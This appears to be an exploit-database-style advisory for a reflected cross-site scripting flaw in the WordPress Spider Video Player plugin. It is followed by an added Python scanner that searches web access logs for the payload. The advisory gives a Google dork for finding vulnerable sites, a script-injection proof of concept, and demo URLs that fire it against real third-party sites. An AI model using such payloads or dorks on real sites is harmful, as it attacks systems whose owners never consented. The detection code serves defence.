#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: WordPress Spider Video Player plugin Cross-Site Scripting
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Date : 2014-08-01
|
| [*] Vendor Homepage : http://web-dorado.com
|
| [*] Version : 2.1
|
| [*] Google Dork: inurl:wp-content/plugins/player/settings.php
|
| [*] Tested on: Windows, Mozilla Firefox
|-------------------------------------------------------------------------|
| [*] Kind: Reflected XSS
|
| [*] PoC :
|
| [*] [Localhost]/wordpress/wp-content/plugins/player/settings.php?s_v_player_id="/><script>alert(1);</script>
|-------------------------------------------------------------------------|
| [*] Demo:
|
| [*] http://www.betXon-mobile-tp.fr/blog-beton/wp-content/plugins/player/settings.php?s_v_player_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
| [*] http://www.cinXtro.com.br/wordpress/wp-content/plugins/player/settings.php?s_v_player_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
| [*] http://www.sonXorapalaciosjr.cl/demos/wordpress/wp-content/plugins/player/settings.php?s_v_player_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|-------------------------------------------------------------------------|
| [*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
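
The PoC above, turned into a log check for defenders (an added example, not part of the original advisory): it scans access log lines for requests to the plugin's settings.php whose s_v_player_id value contains HTML metacharacters after URL decoding. The sample log lines, the combined log format and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

PLUGIN_PATH = "/wp-content/plugins/player/settings.php"  # path named in the advisory
PARAM = "s_v_player_id"                                   # parameter named in the advisory
# Characters needed to break out of an HTML attribute or open a tag.
HTML_META = re.compile(r"[\"'<>]")
# Request line of a combined-format access log entry (format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, hypothetical host paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2014:10:00:00 +0000] "GET /wordpress/wp-content/plugins/player/settings.php?s_v_player_id=3 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Aug/2014:10:00:05 +0000] "GET /wordpress/wp-content/plugins/player/settings.php?s_v_player_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 540',
    '203.0.113.7 - - [01/Aug/2014:10:00:09 +0000] "GET /index.php?s_v_player_id=%3Cb%3E HTTP/1.1" 200 100',
    '203.0.113.9 - - [01/Aug/2014:10:01:00 +0000] "GET /blog/wp-content/plugins/player/settings.php?s_v_player_id=%2522%253E%253Cscript%253E HTTP/1.1" 200 530',
]

def suspicious_values(log_line):
    """Return decoded s_v_player_id values in one log line that carry HTML metacharacters."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith(PLUGIN_PATH):
        return []  # a different script; out of scope for this check
    hits = []
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        # parse_qs decodes once; decode a second time to catch double-encoded input.
        decoded = unquote(value)
        if HTML_META.search(decoded):
            hits.append(decoded)
    return hits

def scan(lines):
    """Return (line_number, decoded_value) for every suspicious request in lines."""
    return [(n, v) for n, line in enumerate(lines, 1) for v in suspicious_values(line)]

if __name__ == "__main__":
    for line_no, value in scan(SAMPLE_LOG):
        print(f"line {line_no}: {PARAM}={value!r}")
```

A hit only shows that markup was sent to the parameter; whether it was reflected unescaped depends on the installed plugin version.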